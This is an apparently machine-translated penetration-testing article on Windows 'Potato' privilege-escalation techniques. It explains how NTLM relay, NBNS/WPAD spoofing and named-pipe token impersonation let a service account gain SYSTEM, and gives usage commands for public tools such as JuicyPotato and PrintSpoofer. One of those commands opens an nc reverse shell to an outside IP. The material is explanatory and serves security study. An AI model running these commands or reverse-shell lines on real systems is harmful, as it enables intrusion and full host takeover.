Potato 家族提权分析

1 前言

1.1 windows 服务的登录用户

Local System - NT AUTHORITY\SYSTEM

Network Service - NT AUTHORITY\Network Service

Local Service - NT AUTHORITY\Local Service

The service account itself has high permissions in the Windows permission model. During the actual penetration process, when you get the webshell, the user permissions are IIS or apache, or xp_cmdshell is executed through SQLi. At this time, the service account in your hand is a low permission account when performing operations, and using this privilege escalation method, you can directly obtain SYSTEM permissions.

1.2 前提

The premise of raising rights with Potato (except Hot Potato) is that you haveSeImpersonatePrivilegeorSeAssignPrimaryTokenPrivilegepermissions, and the following users haveSeImpersonatePrivilegepermissions (and only accounts with higher privileges such as SYSTEM have SeAssignPrimaryTokenPrivilege permissions):

Local administrator account (excluding the administrator group normal account) and local service account

Services initiated by SCM

PS: During native testing, even if SeImpersonatePrivilege privilege is granted to the administrator group ordinary user in the local policy, whoami /priv does not display the privilege in cmd.exe and cannot be utilized; while SeAssignPrimaryTokenPrivilege privilege can be granted to the ordinary user normally

1.3 Windows Token

Windows token is an object that describes the security context. After the user logs in, the system will generate a token. This token will be copied continuously when creating a new process or a new thread.

When the user hasSeImpersonatePrivilegeprivileges, he can callCreateProcessWithTokenWto start a new process with the permissions of a certain token

When the user hasSeAssignPrimaryTokenPrivilegeprivileges, he can callCreateProcessAsUserWto start a new process with Token permissions

For details, please refer to the article "Windows Access Token Attack".

2 Hot Potato

2.1 简介

In January 2016, Dominic White published an article publishing a permissions-elevating attack based on NTLM reflection, named Hot Potato. You can upgrade from the host's minimum user permission to the system's highest NT\AUTHORITY SYSTEM permission.

Hot Potato uses the famous NTLM Relay attack (HTTP - SMB) and NBNS spoofing attacks to obtain the highest permissions SYSTEM on Windows systems. You can upgrade from the host's minimum user permission to the system's highest NT\AUTHORITY SYSTEM permission.

2.2 NBNS

2.2.1 概念

NBNS (Net BIOS Name Service) is a UDP broadcast service that is widely used in Windows systems, that is, a named query service. This service is implemented using the UDP protocol, and local name resolution can be achieved by sending broadcasts within the LAN.

Similar to DNS in the TCP/IP protocol, it is responsible for finding the corresponding IP address of the target machine and giving a NetBIOS name. Microsoft WINS service adopts the NBNS protocol.

2.2.2 NBNS 欺骗

The logic of the system to perform a name query is as follows:

First query the local hosts file

DNS Lookup query (local DNS cache, then request it from the DNS server)

NBNS Query

The logic of NBNS is to broadcast a message to all local hosts, who is xxx, and if anyone responds to the broadcast message, who is xxx

During intranet penetration testing, attackers often listen to NBNS broadcast messages and answer that they are xxx, which is NBNS spoofing; ARP spoofing is the MAC layer spoofing method

The NBNS package has 1 2-byte TXID field and must match the request\response. Because it is a privilege escalation vulnerability, there is no permission to listen to traffic before the attack. Flood guessing can be done between 1-65535.

If there are DNS records in the network, the NBNS protocol will not be used at this time; all DNS queries can be failed through attack technology that exhausts UDP ports, so the NBNS protocol must be used

2.3 WPAD 代理

In Windows system, the IE browser will automatically detect the IE agent configuration information, which is accessed, http://wpad/wpad.dat#8221

WPAD does not necessarily exist in the network, because even with a DNS server, there is no need to parse WPAD unless the network wants to automatically configure proxy information in the network through configuration scripts, which is very convenient.

Therefore, when hosts and DNS queries cannot obtain WPAD, the system must use NBNS to query the name. At this time, you can use NBNS to spoof yourself and tell yourself that WPAD can construct an HTTP server and respond to HTTP http://wpad/wpad.dat#8221 query

By building HTTP on 127.0.0.1, all traffic querying WPAD is directed to local 127.0.0.1; even if the NBNS spoofing WPAD issued by low-privileged users, the high-privileged process will be affected, and WPAD is believed to be the result of the spoofing. Includes the local administrator process and the SYSTEM process.

2.4 HTTP - SMB NTLM Relay

NTLM authentication has poor defense capabilities for man-in-the-middle attacks. Previously, the playback attacks against NTLM focused on the SMB-SMB protocol, reflecting attacks on visitors' hosts and obtaining remote execution permissions;

Microsoft blocks the replay reflection attack of the SMB-SMB protocol through patches, but HTTP-SMB cross-protocol attacks are still valid

2.5 攻击流程

Hot Potato attack combines these points to achieve permission enhancement:

NBNS Scam

Construct local HTTP and respond to WPAD

HTTP - SMB NTLM Relay

Waiting for access by high-privileged processes, that is, activate the update service (low-privileges can be activated)

https://github.com/Kevin-Robertson/Tater

1

2

Import-Module .\Tater.ps1

Invoke-Tater -Command 'command to execute'

Tool address: https://github.com/foxglovesec/Potato

Win7 utilization - Windows Defender update mechanism

1

Potato.exe -ip -cmd [cmd to run] -disable_exhaust true

Win Server 2008 Utilization - Windows Update Mechanism

1

Potato.exe -ip -cmd [cmd to run] -disable_exhaust true -disable_defender true -spoof_host WPAD.EMC.LOCAL

Win Server 2012 R2 - Automatic update mechanism, this opportunity downloads the certificate trust list (CTL) every day

1

Potato.exe -ip -cmd [cmd to run] -disable_exhaust true -disable_defender true

Protection:

SMB signature

3 Rotten Potato JuicyPotato

3.1 原理

These two are different from the initial Potato, which use DCOM CALL to make the service initiate a connection to the port that the attacker listens to and perform NTLM authentication.

Rotten Potato and Juicy Potato have almost the same principles, the latter being perfected on the former.

A few knowledge to understand:

When using DCOM, if you connect remotely as a service, the permission is System, such as BITS service

Using DCOM, you can connect to a port of the machine through TCP to initiate NTLM authentication, which can be replayed

LocalService users have SeImpersonate and SeAssignPrimaryToken permissions by default

After enabling SeImpersonate permission, you can pass in a new token to create a new process when calling CreateProcessWithToken.

After enabling SeAssignPrimaryToken permission, you can pass in a new token to create a new process when calling CreateProcessAsUser

3.2 实现流程

Load COM, issue a request, permission is System

Attempt to load a COM object at the location specified for the ip and port

The COM object used by RottenPotatoNG is BITS and the CLSID is {4991d34b-80a1-4291-83b6-3328366b9097}

The COM objects to choose are not unique. Juicy Potato provides multiple. For detailed lists, please refer to the following address:

https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

Respond to the request in step 1 and initiate NTLM authentication

Under normal circumstances, due to insufficient permissions, the current permission is not System, and the authentication cannot be successful.

For local ports, NTLM authentication is also initiated, with permissions being the current user

Since the permission is the current user, NTLM authentication can be successfully completed

information

Port 135 used by RottenPotatoNG

Juicy Potato supports specifying any local port, but RPC generally defaults to port 135 and is rarely modified.

Intercept two NTLM-authenticated data packets, replace the data, and replay through NTLM to enable the NTLM authentication of step 1 (the permission is System) to obtain the System permission to the Token

When replaying, you need to pay attention to the different NTLM Server Challenge certified by NTLM and needs to be corrected.

Create a new process with System permissions tokens

If SeImpersonate permission is enabled, call CreateProcessWithToken, pass in the token with System permissions, and the created process is System permissions

or

If SeAssignPrimaryToken permission is enabled, call CreateProcessAsUser, pass in the token with System permissions, and the created process is System permissions

3.2 实战

Tool address: https://github.com/ohpe/juicy-potato

3.2.1 initial access

A webshell with iis apppool\defaultapppool permissions.

3.2.2 根据操作系统选择可用的 CLSID

Reference List

https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

For example, test system Server2012, select CLSID as {8BC3F05E-D86B-11D0-A075-00C04FB68820}

Verify one by one using batch call juicypotato.exe:

The address is as follows:

https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat

bat script does not need to be modified

3.2.3 提权

Upload CS horse, or bounce back an interactive shell:

Use JuicePotato to execute commands or C2 programs

4 PrintSpoofer (PipePotato or BadPotato)

4.1 原理

Simulate the token of a high-privileged client through an API: ImpersonateNamedPipeClient of Windows named pipe (and similar ImpersonatedLoggedOnUser, RpcImpersonateClient function). Calling this function will change the security context of the current thread. It utilizes the bugs checked by the printer component path, allowing the SYSTEM permission service to connect to the named pipe created by the attacker.

The spoolsv.exe service has an open RPC service with the following functions:

1

2

3

4

5

6

7

DWORD RpcRemoteFindFirstPrinterChangeNotificationEx(

/* [in] */PRINTER_HANDLE hPrinter,

/* [in] */DWORD fdwFlags,

/* [in] */DWORD fdwOptions,

/* [unique][string][in] */wchar_t *pszLocalMachine,

/* [in] */DWORD dwPrinterLocal,

/* [unique][in] */RPC_V2_NOTIFY_OPTIONS *pOptions)

The pszLocalMachine parameter needs to be passed UNC path. When passing \\127.0.0.1, the server will access \\127.0.0.1\pipe\spoolss, but this pipeline has been registered by the system. If we pass \\127.0.0.1\pipe, an error will be reported due to path checking.

However, when passing \\127.0.0.1/pipe/foo, when checking the path, it will consider 127.0.0.1/pipe/foo as the host name. Then when connecting named pipe, the parameters will be standardized, and/is converted into \, so \\127.0.0.1\pipe\foo\pipe\spoolss will be connected, and the attacker can register this named pipe to steal the client's token. This POC starts a new process using CreateProcessAsUser instead of CreateProcessWithToken.

4.2 实战

Tool address: https://github.com/itm4n/PrintSpoofer

4.2.1 派生一个 SYSTEM 交互式 shell

Applicable to the state where it is currently an interactive shell:

1

2

3

4

5

6

7

8

9

C:\TOOLSPrintSpoofer.exe -i -c cmd

[+] Found privilege: SeImpersonatePrivilege

[+] Named pipe listening.

[+] CreateProcessAsUser() OK

Microsoft Windows [Version 10.0.19613.1000]

(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32whoami

nt authority\system

4.2.2 派生一个 SYSTEM 的进程

is suitable for non-interactive shells, but can be executed by commands, using CS to launch or nc to rebound high permission shells:

1

2

3

4

C:\TOOLSPrintSpoofer.exe -c 'C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd'

[+] Found privilege: SeImpersonatePrivilege

[+] Named pipe listening.

[+] CreateProcessAsUser() OK

4.2.3 桌面环境下派生 SYSTEM 进程

Under local login or RDP, first use qwinsta to view the current ID number, and then use POC:

1

2

3

4

C:\TOOLSPrintSpoofer.exe -d 3 -c 'powershell -ep bypass'

[+] Found privilege: SeImpersonatePrivilege

[+] Named pipe listening.

[+] CreateProcessAsUser() OK

5 RoguePotato

5.1 原理

This also uses the named pipe

After Microsoft patches, the higher version of Windows DCOM parser does not allow the DUALSTRINGARRAY field in OBJREF to specify the port number. To bypass this limitation and be able to negotiate local tokens, the author forwarded traffic on port 135 on a remote host, turned it back to the victim's native port, and wrote a malicious RPC OXID parser.

5.2 实战

Tool address: https://github.com/antonioCoco/RoguePotato

1

2

3

4

5

6

7

8

9

10

Mandatory args:

-r remote_ip: ip of the remote machine to use as redirector

-e commandline: commandline of the program to launch

Optional args:

-l listening_port: This will run the RogueOxidResolver locally on the specified port

-c {clsid}: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})

-p pipename_placeholder: placeholder to be used in the pipe name creation (default: RoguePotato)

-z : this flag will randomize the pipename_placeholder (don't use with -p)

6 SweetPotato

6.1 原理

The collection version of COM/WinRM/Spoolsv, that is, the collection version of Juicy/PrintSpoofer

6.2 实战

Tool address: https://github.com/CCob/SweetPotato

refer to:

https://foxglovesecurity.com/2016/01/16/hot-potato/

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

https://xz.aliyun.com/t/7776/#toc-4

https://3gstudent.github.io/3gstudent.github.io/Windows local authority elevation tool Juicy-Potato test analysis/

https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/

https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-rogue